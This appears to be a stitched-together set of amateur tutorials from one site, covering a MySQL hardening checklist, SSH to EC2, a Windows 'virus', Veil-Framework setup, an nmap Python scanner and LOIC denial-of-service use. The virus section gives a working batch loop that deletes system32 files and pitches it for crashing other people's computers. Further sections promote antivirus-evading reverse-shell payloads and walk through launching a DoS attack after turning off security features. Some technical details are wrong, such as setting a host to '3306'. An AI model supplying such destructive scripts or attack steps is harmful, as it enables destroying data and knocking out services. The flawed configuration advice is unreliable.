How to make sure your MySQL database is secured

Auditing and logging for information systems

Logs play a crucial role for security when there is a suspected cyberattack. A manual review of logs is painstaking for security personnel, and they must use log review tools to extract information and analyze it. Logs should use a WORM (write once read many) storage technology and encryption to avoid corruption and losing log data. Also, logs should have a standardized format for ease of maintenance, access and comparison.

Ensure “log_error” is not empty
command:

SHOW variables LIKE 'log_error';

Error logs contains data on events when mysqld starts or stops. It also shows when a table needs to be assessed or repaired. It must generate a “value”. The reason for enabling error logging is it helps increase the ability to detect malicious attempts against MySQL and other vital messages.

---

Ensure log files are stored on a non-system partition
command:

SELECT @@global.log_bin_basename;

Log files of MySQL can be stored anywhere in the filesystem and set using the MySQL configuration. Also, it is a best practice is to ensure that the logs in the filesystem are not cluttered with other logs such as application logs. You must ensure that the value returned does not indicate that it is in the root “(‘/’)”, “/var”, or “/usr”. The reason for this is that partitioning will decrease the likelihood of denial of service if the available disk space to the operating system is depleted.

---

Ensure “log_error_verbosity” is not set to “1”
command:

SHOW GLOBAL VARIABLES LIKE 'log_error_verbosity';

This check provides additional information to what functionalities the MySQL log has or has enabled on error messages. A value of 1 enables the logging of error messages. A value of 2 enables both the logging of error and warning messages. A value of 3 enables logging of error, warning, and note messages. This helps detect malicious behavior by logging communication errors and aborted connections.

---

Ensure audit logging is enabled

Enabling audit logging is crucial for production environment for interactive user sessions and application sessions. With audit logging, it helps identify who changed what and when. It can also help to identify what an attacker has done and can even be used as evidence in investigations.

command:

SELECT NAME FROM performance_schema.setup_instruments WHERE NAME LIKE ‘%/alog/%’;

show global status like 'AUDIT_version';

---

No audit log plugins

show plugins

---

General log query 

SET GLOBAL general_log = 'ON' ;

---

CREATE USER ‘user1’@’localhost’ IDENTIFIED BY PASSWORD ‘not-so-secret’;

The log’s path in Windows 10 can be found by using Services application, looking to see if MySQL is running, and right-click properties.

The log in the author’s system was located in: C:\ProgramData\MySQL\MySQL Server 5.7\Data\DJ-JASON-CLARK.log

---

Authentication for information system

Authentication makes sure the credentials provided by the user or machine are matched with the database of authorized users in a local operating system or in an authentication server. Authentication is then followed by authorization, which is granted by an administrator to users or machines. An authentication that is commonly used in both private and public networks is password-based authentication.

---

Ensure passwords are not stored in the global configuration

The [client] section of a MySQL configuration file allows the creation of a user and password to be set. The check is important because allowing a user and password in the configuration file impacts the confidentiality of the user’s password negatively.

To audit, open MySQL configuration file and examine the [client] section — it must not have any password stored. No password was set in the author’s system (see figure below). If a password was set in the configuration file, use mysql_config_editor to store passwords in the encrypted form in .mylogin.cnf.

[client] section of MySQL configuration file

[client]

# pipe=
# socket=0.0
port=3306

---

Ensure ‘sql_mode’ contains ‘NO_AUTO_CREATE_USER’

The “no_auto_create_user” is an option to prevent the auto creation of user when authentication information is not provided.

SELECT @@global.sql_mode;

SELECT @@session.sql_mode;

 

---

Ensure passwords are set for all MySQL accounts

A user can create a blank password. Having a blank password is risky as anyone can just assume the user’s identity, enter the user’s loginID and connect to the server. This bypasses authentication, which is bad.

SELECT User,host FROM mysql.user WHERE authentication_string=’’;

---

 Ensure ‘default_password_lifetime’ is less than or equal to ‘90’

Changing the password lifetime to 90 days decreases the time available for the attacker to compromise the password, and thus decreases the likelihood of getting attacked.

SHOW VARIABLES LIKE ‘default_password_lifetime’;

SET GLOBAL default_password_lifetime=90;

 

---

Ensure password complexity is in place

Password complexity adds security strength to authentications and includes adding or increasing length, case, numbers and special characters. The more complex the password, the harder for attackers to use brute force to obtain the password. Weak passwords are easily obtained in a password dictionary.

SHOW VARIABLES LIKE ‘validate_password%’;

Implement password complexity

my.ini

plugin-load=validate_password.so
validate-password=FORCE_PLUS_PERMANENT
validate_password_length=14
validate_password_mixed_case_count=1
validate_password_number_count=1
validate_password_special_char_count=1
validate_password_policy=MEDIUM

---

Ensure no users have wildcard hostnames

Users with wildcard hostnames (%) are granted permission to any location. It is best to avoid creating wildcard hostnames. Instead, create users and give them specific locations from which a given user may connect to and interact with the database.

Wildcard hostname

SELECT user, host FROM mysql.user WHERE host = ‘%’;

Change wildcard hostname

update mysql.user SET host='3306' WHERE user='kwikl3arn';

select user,host from mysql.user where host='3306';

---

Ensure no anonymous accounts exist

Users can have an anonymous (empty or blank) username. These anonymous usernames have no passwords and any other user can use that anonymous username to connect to the MySQL server. Removal of these anonymous accounts ensures only identified and trusted users can access the MySQL server.

SELECT user,host FROM mysql.user WHERE user = ‘’;

---

Network connection to MySQL server

The network connection plays an important role for communication between the user and the MySQL server. Insecure network connections are very vulnerable to attacks. The following are checks for network connection security.

 

---

Ensure ‘have_ssl’ is set to ‘YES’

To avoid malicious attackers peeking inside your system, it is best to use SLL/TLS for all network traffic when using untrusted networks.

show WHERE variable_name = ‘have_ssl’;

---

Ensure ‘ssl_type’ is set to ‘ANY’, ‘X509’, or ‘SPECIFIED’ for all remote users

SSL/TLS should be configured per user. This further prevents eavesdropping of malicious attackers.

SELECT user, host, ssl_type FROM mysql.user WHERE NOT HOST IN (‘::1’, ‘127.0.0.1’, ‘localhost’);

---

Replication

Checking for replication status lets you monitor performance and security vulnerabilities. Microsoft SQL Server Management Studio has the following tools to monitor replication:

1. view snapshot agent status,
2. view log reader agent status, and
3. view synchronization status.

---

Ensure replication traffic is secured

Replication traffic between servers must be secured. During replication transfers, passwords could leak.

To audit, check if they’re using: a private network, a VPN, SSL/TLS or a SSH Tunnel. Hopefully the author’s system is using a private network. Correct if otherwise, and secure by using the private network, a VPN, SSL/TLS or a SSH Tunnel.

---

Ensure ‘MASTER_SSL_VERIFY_SERVER_CERT’ Is Set to ‘YES’ or ‘1’

‘MASTER_SSL_VERIFY_SERVER_CERT’ checks whether the replica should verify the primary's certificate or not. The replica should verify the primary's certificate to authenticate the primary before continuing the connection.

SELECT ssl_verify_server_cert FROM mysql.slave_master_info;

---

Ensure ‘master_info_repository’ is set to ‘TABLE’

The ‘master_info_repository’ determines where the replica logs the primary's status and connection information. The password is stored in the primary info repository that is a plain text file. Storing the password in the TABLE master_info is a safer.

SHOW GLOBAL VARIABLES LIKE ‘master_info_repository’;

---

Ensure ‘super_priv’ is not set to ‘Y’ for replication users

The “SUPER” privilege (‘super_priv’) located in the “mysql.user” table has functions like “CHANGE”, “MASTER TO”, “KILL”, “mysqladmin kill”, “PURGE BINARY LOGS”, “SET GLOBAL”, “mysqladmin debug”, and other logging controls. Giving a user the “SUPER” privilege allows the user to view and terminate currently executing SQL statements, even for password management. If the attacker exploits and gains the “SUPER” privilege, they can disable, alter, or destroy logging data.

SELECT user, host FROM mysql.user WHERE user='repl' and Super_priv = 'Y';

---

Ensure no replication users have wildcard hostnames

MySQL allows you to grant permissions to wildcard hostnames. Wildcard hostnames should be avoided, and you should create or modify users and give them specific locations from which a given user may connect to and interact with the database.

select user,host from mysql.user where user='repl' and host='%';

 

How to SSH Amazon EC2 from Windows 10 CMD without PUTTY

First, you need to spin up an Amazon EC2 instance and save the pem file on your local machine. You can save it as test.pem Then make sure that you have SSH server and SSH client option enabled under the Apps & Feature tab on Windows 10.

Open the Windows power shell and navigate to the directory where you kept your pem file. Execute the below command one by one FYI: Rename the aws-ec2.pem to your original pem file name.

$path = ".\test.pem"
# Reset to remove explicit permissions
icacls.exe $path /reset
# Give current user explicit read-permission
icacls.exe $path /GRANT:R "$($env:USERNAME):(R)"
# Disable inheritance and remove inherited permissions
icacls.exe $path /inheritance:r

Note: If you don't execute the above command you'll get the below errors : Windows SSH: Permissions for 'private-key' are too open Set correct permissions -- warning unprotected private key file windows 10 -- ssh error warning unprotected private key file -- it is required that your private key files are not accessible by others. windows Now copy the ssh command that you find inside the connect tab on Amazon EC2.

Open the command prompt and navigate to your pem file location. Execu the below command.

ssh-keygen -y -f test.pem > MyKP.pub

 

How create a simple virus program in Windows 7/10?

Everyone wants to get exicited and crashers the other persons computers involving and spending more time..Here, In kwikl3arn we can do a simply creating an virus program in windows 7/10.

Before going to create program, please make a Note Here, We the kwikl3arn.com or his authors are not responseible for any damaged control or crashers the computer... Its only for Knowledge and Learning purpose...Please dont do for other computers/organizations .......

Lets Start Creating an program; So for this we need to create a .bat file (means .batch file). open a notepad or text document,Here i had written a simple program but dangerous file..... 

​
@echo off

:p

del C:\windows\system32 *.*

goto p

​

then save as with anyname with dotbat file (.bat) as example; crasher.bat file and please dont try to run on your own personal computers it because it will delete all your windows system32 dll files. For windows XP or before systems add below line and do save as.

del C:\winNT\*.*

Its just simple program if you wanna try please do it in VirtualMachine Windows 7/10 it does not affect with your personal computer C drive....

How to Install and Configure Veil-framework in linux,parrot? 

Firstly, We  should gain some knowledge on Veil-Framework....

What is Veil-Framework?

The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, FortyNorth Security will use the Veil-Framework to help achieve their objective.The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of shellcode into a Windows executable that will evade detections by common antivirus products.We use Veil-Framework for creating an Exploit payload for C,python,perl,ruby,powershell by using an meterpreter reverse or an  shell code.

Veil 3.0 users still have the ability to use msfvenom to generate their shellcode, but they now also have the option to use Ordnance. Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on. Ordnance supports the most popular payload types:

1. Reverse TCP
2. Reverse HTTP
3. Reverse HTTPS
4. Reverse TCP DNS
5. Reverse TCP All Ports
6. Bind TCP

So, we had gained some knowledge about veil-framework.Lets start the process for Veil-framework installation

Here, I had installed and configured Veil-Framework in parrot, As same procedure can do it in linux,centos.

Firslty, we need to update the system

​
​┌─[[email protected]]─[~]
└──╼ $sudo apt-get update 
┌─[[email protected]]─[~]
└──╼ $sudo apt-get -y upgrade

then we need to install wine32,git

[[email protected]]─[~]
└──╼ $sudo apt-get install wine32

[[email protected]]─[~]
└──╼ $sudo apt-get install git

We need to download Veil-Framework from GitHub here I used 

[[email protected]]─[~]
└──╼ $git clone https://github.com/Veil-Framework/Veil.git

Then we will goto Veil directory 

[[email protected]]─[~]
└──$cd Veil
[[email protected]]─[~]
└──$ll
[[email protected]]─[~]
└──$./config/setup.sh --force --silent

Here it will downlad all the required packages internally in veil-framework and take a minutes depends up on the internet speed.

How to Create a Simple Burteforcing password cracker using python?

Here we are using pycharm in parot OS.So for this we need to check whether pip is installed or not if not we need to install pip package by

go to pycharm terminal -----> pip install ------> and recheck by pip list.

Now will create a simple Bruteforcing password

 

How to scan a ports in linux,parrot,ubuntu using nmap python?

Firstly, we need some of the requirements and config. Requirements are:

• Pycharm professional 
• nmap
• Ubuntu,parrot and linux are the OS

We need to install a pycharm professional in parrot.Here I had installed in parrot,As same installation is done in linux and Ubuntu also.

How to install a Pycharm professional in parrot?

Firstly, we need to download a pycharm professional from its site link as https://www.jetbrains.com/pycharm/download/other.html  Here i had downloaded pycharm professional for linux version in zip format

  

Then, Go to downloads path tar the zip file by using an command tar -zxvf pycharm-professional-2019.3.3.tar.gz. After tar unzip, the above file shows as pycharm-2019.3 

Then Go to pycharm-2019.3 file as cd pycharm-2019.3-----> go to bin file in that as cd bin/-----------> Here you can a list of files then giving chmod perssions by using root as command chmod +x pycharm.sh

|

After giving chmod permissions,Run a program as --------> ./pycharm.sh pycharm professional will open it and setup process is done After that open a new project specify the path for an program to execute name the folder and create it and now to go file--->

click on new----->go to python file name it..Here i had named as sam.py Now we can start programming using pycharm.....

---

How to create a  Nmap network scanner using python?

Firstly, we need to import a package  called python-nmap. So for this in pycharm below go to terminal ---> check pip is installed or not by pip list------> then pip install pyhton-nmap------> re-check it by pip list.

After succesfully installed python nmap we can start program for network port scanner...               

import nmap                               # importing an nmap package
ns = nmap.PortScanner()                   #  giving an portscanner function

print (ns.nmap_version())                 # i need to print nmap version

ns.scan('192.168.45.139','1-1000', '-v')  # here declaring self host (localhost) or your ip 
                                          addressing, give some ports (as 1-1000), and arguments as -v

print (ns.scaninfo())                     # need to print a scan
print (ns.csv())                          # then printed scan info puts in csv 

Runs the program by pressing ctrl+shift+F10. Here i had run the program resulted as 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Now we can change the ip and ports and allow all host and check whether ip is up or down by using these code and resultant as 

               

 ns.scan('192.168.45.139','22-46477', '-v --version-all')     # I had changed ports and arguments
          
 print(ns.all_hosts())                                        # here all hosts for scan

 print(ns['192.168.45.139'].state())        # by state() after ip whether to check ip is up or down

import nmap
ns = nmap.PortScanner()

print (ns.nmap_version())
ns.scan('192.168.45.139','22-46477', '-v --version-all')
print(ns.all_hosts())
print(ns['192.168.45.139'].state())
print(ns['192.168.45.139'].all_protocols())        #  scanning all protocols
print(ns['192.168.45.139']['tcp'].keys())          # adding an TCAP for tcp keys which are there
print(ns['192.168.45.139'].has_tcp(80))            # need to know tcp port 80 is open or not

Resultant output you can get as below so finally we can create like this file to scan the networks using python nmap..

 

 

 

 

 

 

Denial of Service..... (DOS)!!! Attack!!!

What is Denial of Service (DOS)?

A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic, or sending it information that triggers a crash. In both instances, the DoS attack deprives legitimate users (i.e. employees, members, or account holders) of the service or resource they expected.

Victims of DoS attacks often target web servers of high-profile organizations such as banking, commerce, and media companies, or government and trade organizations. If  an Attacker wanna do an DOS Attack for an machine or a web site,he/she can easily do a an attck from anyplace by using some tools ....

   Free DOS Attack tools are:

• LOIC
• HOIC`
• HULK
• Tor's Hammer
• slowlorics
• PyLoris
• RUDY

LOIC

    The most famous for hackers,inforamation securityexperts,PT(Pentesters) and its also a free tool for windows and kali-linux and parrot.Mostly this tool was used from windows/kali -linux machines.So, LOIC means LOW ORBIT ION CANON.It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.

DOWNLOAD LINK: 

https://sourceforge.net/projects/loic/

Here's the download link it would be installed in windows (For Download please do turn off security features in your machine)

yah...! It had downloaded it and installed...!!! So,if you in above picture Enter the URL of any site (please do not go any governtment or offical websites) or IP address (recommand us your private ip)hit on Lock on. Below you will be displayed with target ip and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.